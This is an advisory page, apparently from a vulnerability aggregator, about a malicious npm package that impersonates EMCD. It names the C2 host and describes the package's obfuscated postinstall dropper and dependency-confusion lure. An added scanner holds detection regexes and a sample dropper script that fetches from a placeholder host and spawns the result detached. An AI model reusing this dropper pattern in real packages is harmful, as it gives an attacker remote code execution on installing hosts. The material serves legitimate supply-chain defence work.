Vulnerability
Malicious code in @emcd-vue/b2b-pay-form (npm)
Part of a coordinated multi-package supply-chain attack impersonating EMCD (emcd.io), a legitimate Russian cryptocurrency exchange and mining pool. The attacker registered the `@emcd-vue` npm scope to distribute multiple malicious packages posing as internal tooling under the "EMCD Platform Engineering" identity. This package was published on the same day as confirmed campaign packages `@emcd-vue/auth` and `@emcd-vue/loans`, which share C2 infrastructure at `oob.moika.tech`. The package description ("Internal HTTP client with retry, auth injection and request tracing") is fabricated; the `@emcd-vue` scope has no affiliation with the real EMCD exchange (`emcd.io`). Campaign packages in this scope use a multi-stage postinstall dropper that downloads and executes a platform-specific payload from `https://oob.moika.tech/payload/{platform}` using a shared secret key, writes the payload to a hidden dot-file in the user's home directory, and beacons installation metadata to `https://oob.moika.tech/report`.

---

## Source: amazon-inspector (e45e677cee670117b0ff7dcdf2f04491cfb61385025a178e197ea35924e9410e)

@emcd-vue/b2b-pay-form ships an obfuscator.io-encoded scripts/postinstall.js wired as the npm `postinstall` lifecycle hook. On `npm install`, the script builds a platform-keyed URL from `os.platform()`, performs an HTTPS GET of a remote payload, writes it to `os.tmpdir()`, and spawns it via `spawn(process.execPath, [tmpFile], {detached:true}).unref()` — a classic install-time dropper that grants the publisher arbitrary remote code execution on every installing host. An environment-variable kill switch and a TTL-gated JSON cache in the user home directory throttle re-execution to evade detection. The package's stated purpose is an 'Internal HTTP client'; fetching and executing remote Node code is unrelated to that purpose.
The package metadata is also fabricated dependency-confusion bait: scope `@emcd-vue` and all referenced domains (`emcd-vue.io`, `github.emcd-vue.io`, `jira.emcd-vue.io`, `docs.emcd-vue.io`, `npm.emcd-vue.io`, `telemetry.emcd-vue.io`) are not owned by any public organization, and the README instructs consumers to point npm at `https://npm.emcd-vue.io` while branding the package as 'Internal package — Platform Engineering Team' — the canonical pattern for targeting orgs whose private internal scope matches `@emcd-vue` or whose CI lazily resolves unknown scopes from the public registry. The postinstall file itself is heavily obfuscated (string-array + RC4-style decoder, control-flow flattening, self-defending function, 109-entry encoded string table), which has no legitimate purpose for a lifecycle script and is consistent with evasion of review.
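The dropper shape and the registry-steering README described above can be triaged statically before a package is ever installed. The following is an added example, not code from the advisory, Amazon Inspector or any vendor scanner: it scans a parsed package.json plus the files it references for lifecycle hooks that fetch remote code, stage it on disk and run it detached, for obfuscator.io-style identifiers, and for instructions pointing npm at a non-public registry. The sample package, scope, hostnames and script are constructed placeholders.

```javascript
// Added example (not the advisory's or any vendor scanner's code): a static
// triage check for the install-time dropper and registry-steering pattern
// described above, over a parsed package.json plus the files it references.
const HOOKS = ['preinstall', 'install', 'postinstall'];
// Several of these together form the "fetch remote code at install time,
// stage it on disk, run it detached" shape described in the advisory.
const DROPPER_SIGNALS = {
  platformKey: /\.platform\(\)|process\.platform/, remoteUrl: /https?:\/\/[^\s'"`]+/,
  fetchCall: /\.(get|request)\s*\(|\bfetch\s*\(/, stagingDir: /\.tmpdir\(\)|\.homedir\(\)/,
  detachedSpawn: /spawn\s*\([\s\S]*?detached\s*:\s*true/, unref: /\.unref\(\)/,
};
// obfuscator.io output is full of _0x-prefixed identifiers.
const looksObfuscated = (src) => (src.match(/_0x[0-9a-f]{4,}/g) || []).length >= 5;
// Registry URLs the package steers npm toward, other than the public one.
function registryHints(pkg, readme) {
  const urls = new Set(pkg.publishConfig && pkg.publishConfig.registry ? [pkg.publishConfig.registry] : []);
  for (const line of readme.split('\n')) {
    const m = /registry|\.npmrc/i.test(line) && line.match(/https?:\/\/[^\s'"`)]+/);
    if (m) urls.add(m[0]);
  }
  return [...urls].filter((u) => !/^https:\/\/registry\.npmjs\.org\/?$/.test(u));
}
function auditPackage(pkg, files) {
  const findings = [];
  for (const hook of HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (!cmd) continue;
    // Map "node scripts/postinstall.js" to the file text we were given; inline commands are scanned as-is.
    const file = Object.keys(files).find((f) => cmd.includes(f));
    const src = file ? files[file] : cmd;
    const hits = Object.keys(DROPPER_SIGNALS).filter((k) => DROPPER_SIGNALS[k].test(src));
    if (hits.length >= 3) findings.push(`${hook}: install-time dropper shape (${hits.join(', ')})`);
    if (looksObfuscated(src)) findings.push(`${hook}: obfuscated lifecycle script`);
  }
  for (const u of registryHints(pkg, files['README.md'] || '')) findings.push(`non-public registry referenced: ${u}`);
  return findings;
}
// Constructed sample that mimics the described package; scope, hosts and script are placeholders.
const samplePkg = { name: '@placeholder-scope/http-client', scripts: { postinstall: 'node scripts/postinstall.js' } };
const sampleFiles = {
  'README.md': 'Internal package. Configure npm first:\n    npm config set registry https://npm.placeholder-scope.invalid\n',
  'scripts/postinstall.js': [
    "var _0x1a2b=['https','os'];var _0x3c4d=require(_0x1a2b[0]);var _0x5e6f=require(_0x1a2b[1]);",
    "var _0x7a8b='https://c2.placeholder.invalid/payload/'+_0x5e6f.platform();",
    "_0x3c4d.get(_0x7a8b,function(r){var f=_0x5e6f.tmpdir()+'/.cache';",
    "require('child_process').spawn(process.execPath,[f],{detached:true}).unref();});",
  ].join('\n'),
};
console.log(auditPackage(samplePkg, sampleFiles));
```

Run it against an unpacked tarball (`npm pack` then extract) in CI before the package is installed; a hit on the dropper shape or a non-public registry reference is grounds to block the install and review the scope's other packages.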
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence